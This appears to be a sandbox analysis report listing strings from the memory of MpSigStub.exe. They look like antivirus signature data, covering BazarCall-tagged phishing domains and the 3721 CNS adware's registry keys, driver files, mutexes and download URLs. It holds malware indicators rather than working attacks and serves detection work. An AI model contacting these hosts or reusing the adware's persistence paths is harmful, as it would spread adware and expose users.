Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"idriveupdate.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"idrivehepler.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"idrivefinder.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p idrivecheck.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&idrivedownload.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p filmverbine.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: !#nri:ti:domains:bazarcall.a
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: {nxl89
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: (a-3aphx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: )k7q$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 0nvsy
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: $8rfq
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: h22da*
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: gcea{
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ^et?5
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ifsls
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 0uh/8w
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &r6x#i
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: e_=i7a%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: _$qj5
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: qy['{
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ixq;d
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: @'f\|j
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: >lgxq
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: g?asr
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: vng!h
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: v},zl
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: d=7ya
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: `;91m
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: byg)kf\|{
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: g4\g?s0z
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ~v7r;
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: j,dv0
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: lw:>$a
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: i$/gn=
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 7%p3"
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: "u2bu
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: #ek#r
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: e!y6~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: -t`se
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: nq%fq
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 0p/c7!
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: )lm4?jya
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: gw"x_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: #p:''
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .ivtc)u
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p{g$a
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cem"~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ?!(ia
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: xs@\|*25
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: hjxwh
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: `~lu">
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ez`+&=j
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: a}k"!z
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: x@[;c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: '`q'oe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: c3h3l
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: :vfbd
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: nolm&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: k(g
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: taca)m!v
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 0%r`z
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .bd~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: e&6!@]
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: `h*l:
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: )epz8q
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: i3cyc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: $2la!
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: %hrk9
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: swmqw
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: `wd<*
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: pmg[8
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: qa{u.
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: j'~yy
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: :e& x
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: :3a39
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ttyb$de
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: a\|f2~
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: vices\cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: {c22d6d40-47d8-40fe-825a-cc7f4d88b3b8}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsmin\variant
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnscfgf.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsmin.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsmin.datx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnshint.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \cnsminio.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: clsid\{b83fc273-3522-4cc6-92ec-75cc86678da4}\inprocserver32
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 3721cnsbarprop
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnstips
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnscollect
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsplus.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\microsoft\internet explorer\advancedoptions\!cns
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: http://cns.3721.com/cns.dll?xc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsminex.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: http://seek.3721.com/srchasst.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \cns.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \cns.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsminhk.cnshook.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: clsid\{a5adeae7-a8b4-4f94-9128-bf8d8db5e927}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnshook.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: http://download.3721.com/download/cnsminexm.ini
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: %scnsminse.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsminup.cab
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsminup.cabxx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnssearch
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsmincg.ini
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: http://assistant.3721.com/help/uninstcns.htm
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: download.3721.com/download/cns
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsmin\cnsminex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\microsoft\windows\currentversion\explorer\browser helper objects\{d157330a-9ef3-49f8-9a67-4141ac41add4}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsmin.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsmin.datxu
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnshint.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\assist\plugins
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: %s,runsettings -repairie
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsenable
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: assisantshare
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: uninstall\{1b0e7716-898e-48cc-9690-4e338e8de1d3}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: assistantregisterusermutex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 3721helper_cnsx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsmin.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\interchina\chin@ddress
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: chinaddrmainmutexstr
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: http://assistant.3721.com/instok
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsmin
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: assistcns
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: http://download.3721.com/download/cnsminup
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: clsid\{7ca83cf1-3aea-42d0-a4e3-1594fc6e48b2}\inprocserver32
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsautoupdatemutex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsminbypassnamemutex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsmin\variantx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cns.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .\systemroot\cnsinfo.dat
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: j\registry\machine\software\cnredirect
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 8\systemroot\system32\cns.dll
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: 8\systemroot\system32\cns.exe
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \device\cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: (\dosdevices\cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cnsminkp
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: l{d157330a-9ef3-49f8-9a67-4141ac41add4}
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: >\basenamedobjects\cnsminkpevent
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \cnsmin.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\cnsmin.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \cnshook.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: %\cnshook.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \cnscfgf.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\cnscfgf.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \cnscfgr.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\cnscfgr.dat_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \bdhelper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: %\bdhelper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721\helper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721\helper.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721\ces\ces.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721\ces\ces.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721\ces\cessw.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721\ces\cessw.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721\assist\asbar.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721\assist\asbar.dll_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721\assist\assist.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721\assist\assist.ini_
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721\assist\cnsminkp.sys_%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsup.ini_&
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsmin.ini_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsminaf.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsmincg.ini_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsminck.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsmindt.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsminex.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsminio.cab_(
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\cnsminsv.cab_)
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\keepmainm.cab_-
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\3721\cnsminkp.vxd_/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\3721\cnsminkp2k.sys_/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\3721\cnsminkpxp.sys`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721\assist\cnsminkp.sys_%$\downloaded program files\cnsup.ini_&$\downloaded program files\cnsmin.ini_($\downloaded program files\cnsminaf.cab_($\downloaded program files\cnsmincg.ini_($\downloaded program files\cnsminck.cab_($\downloaded program files\cnsmindt.cab_($\downloaded program files\cnsminex.cab_($\downloaded program files\cnsminio.cab_($\downloaded program files\cnsminsv.cab_)$\downloaded program files\keepmainm.cab_-$\downloaded program files\3721\cnsminkp.vxd_/$\downloaded program files\3721\cnsminkp2k.sys_/$\downloaded program files\3721\cnsminkpxp.sys`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \yisou`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\yisou`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \3721\assist`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: &\3721\assist`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \programs\chinese keywor`
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \downloaded program files\3721c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: \programs\chinese keywor` $\downloaded program files\3721c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721c
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\yisou
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\yisouc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\interchina
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\interchinac
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsminc
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsmin
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsminc"
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\zsmod.axobj
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\zsmod.axobjc"
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\zsmod.axobjc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\insiii.brins
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\insiii.brinsc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsmin\cnsminex
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\3721\cnsmin\cnsminexc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\cnshelper.ch
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\cnshelper.chc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\bhoobj.axobj
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\bhoobj.axobjc#
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\insiii.brinsc$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\zsmod.axobj.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\zsmod.axobj.1c$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\autolive.live
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\autolive.livec$
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\zsmod.axobj.1c%
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\insiii.brins.1
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: software\classes\insiii.brins.1c%
